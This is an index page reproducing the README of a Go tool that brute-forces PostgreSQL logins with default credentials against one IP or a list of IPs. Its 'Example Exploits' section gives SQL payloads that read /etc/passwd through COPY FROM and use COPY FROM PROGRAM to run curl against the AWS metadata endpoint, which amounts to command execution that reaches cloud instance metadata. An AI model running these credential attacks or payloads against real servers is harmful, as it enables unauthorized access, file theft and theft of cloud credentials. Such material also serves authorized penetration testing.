Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/randomrobbiebf/postgres-bruteforcer
This tool takes a list of default creds and tests it against a postgresql server and logs any that work and the databases it has access to.
Last synced: about 1 month ago
- Host: GitHub
- URL: https://github.com/randomrobbiebf/postgres-bruteforcer
- Owner: RandomRobbieBF
- Created: 2023-01-11T11:30:01.000Z (almost 2 years ago)
- Default Branch: main
- Last Pushed: 2023-01-11T11:49:03.000Z (almost 2 years ago)
- Last Synced: 2024-06-21T13:57:53.887Z (6 months ago)
- Language: Go
- Size: 9.77 KB
- Stars: 1
- Watchers: 2
- Forks: 2
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# postgres-bruteforcer
About
---
This Go script reads a list of usernames and passwords from a file called `creds.txt` and tests them against a PostgreSQL database.
The script accepts the IP address of the PostgreSQL server as a command-line argument, or a text file of IP addresses.
If access is granted, the script writes this output to a file called `pg-output.txt`.
If the user `postgres` is available, this is normally a superuser, which can allow RCE, LFI, or SSRF.

How to install
---
```
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest
```

How to run
---
```
go run postgres-brute.go 1.1.1.1postgres
```

Example Exploits
---
Grab `/etc/passwd`
```
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;
```

SSRF - Grab AWS Metadata
```
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;
```